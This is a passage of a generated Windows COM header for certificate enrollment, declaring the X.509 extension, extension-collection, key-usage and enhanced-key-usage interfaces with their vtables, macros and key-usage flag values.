#define IX509EndorsementKey_GetCertificateCount(This,ManufacturerOnly,pCount)	\
    ( (This)->lpVtbl -> GetCertificateCount(This,ManufacturerOnly,pCount) ) 

#define IX509EndorsementKey_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509EndorsementKey_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509EndorsementKey_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EndorsementKey_INTERFACE_DEFINED__ */


#ifndef __IX509Extension_INTERFACE_DEFINED__
#define __IX509Extension_INTERFACE_DEFINED__

/* interface IX509Extension */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extension;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30d-217d-11da-b2a4-000e7bbb2b09")
    IX509Extension : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Critical( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Critical( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extension * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extension * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extension * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extension * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extension * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Extension * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509Extension * This,
            /* [in] */ VARIANT_BOOL Value);
        
        END_INTERFACE
    } IX509ExtensionVtbl;

    interface IX509Extension
    {
        CONST_VTBL struct IX509ExtensionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extension_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extension_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extension_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extension_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extension_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extension_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extension_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extension_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Extension_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Extension_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509Extension_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509Extension_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extension_INTERFACE_DEFINED__ */


#ifndef __IX509Extensions_INTERFACE_DEFINED__
#define __IX509Extensions_INTERFACE_DEFINED__

/* interface IX509Extensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30e-217d-11da-b2a4-000e7bbb2b09")
    IX509Extensions : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Extension *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IX509Extensions *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extensions * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extension *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Extensions * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pValue);
        
        END_INTERFACE
    } IX509ExtensionsVtbl;

    interface IX509Extensions
    {
        CONST_VTBL struct IX509ExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extensions_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Extensions_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Extensions_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Extensions_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Extensions_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Extensions_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509Extensions_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define IX509Extensions_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0018 */
/* [local] */ 

typedef 
enum X509KeyUsageFlags
    {
        XCN_CERT_NO_KEY_USAGE	= 0,
        XCN_CERT_DIGITAL_SIGNATURE_KEY_USAGE	= 0x80,
        XCN_CERT_NON_REPUDIATION_KEY_USAGE	= 0x40,
        XCN_CERT_KEY_ENCIPHERMENT_KEY_USAGE	= 0x20,
        XCN_CERT_DATA_ENCIPHERMENT_KEY_USAGE	= 0x10,
        XCN_CERT_KEY_AGREEMENT_KEY_USAGE	= 0x8,
        XCN_CERT_KEY_CERT_SIGN_KEY_USAGE	= 0x4,
        XCN_CERT_OFFLINE_CRL_SIGN_KEY_USAGE	= 0x2,
        XCN_CERT_CRL_SIGN_KEY_USAGE	= 0x2,
        XCN_CERT_ENCIPHER_ONLY_KEY_USAGE	= 0x1,
        XCN_CERT_DECIPHER_ONLY_KEY_USAGE	= ( 0x80 << 8 ) 
    } 	X509KeyUsageFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0018_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0018_v0_0_s_ifspec;

#ifndef __IX509ExtensionKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30f-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeyUsageFlags UsageFlags) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionKeyUsage * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ X509KeyUsageFlags UsageFlags);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue);
        
        END_INTERFACE
    } IX509ExtensionKeyUsageVtbl;

    interface IX509ExtensionKeyUsage
    {
        CONST_VTBL struct IX509ExtensionKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionKeyUsage_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionKeyUsage_InitializeEncode(This,UsageFlags)	\
    ( (This)->lpVtbl -> InitializeEncode(This,UsageFlags) ) 

#define IX509ExtensionKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionEnhancedKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionEnhancedKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab310-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionEnhancedKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnhancedKeyUsage( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionEnhancedKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionEnhancedKeyUsage * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnhancedKeyUsage )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } IX509ExtensionEnhancedKeyUsageVtbl;

    interface IX509ExtensionEnhancedKeyUsage
    {
        CONST_VTBL struct IX509ExtensionEnhancedKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionEnhancedKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionEnhancedKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionEnhancedKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionEnhancedKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionEnhancedKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionEnhancedKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_RawData(This,Encoding,pValue)	\
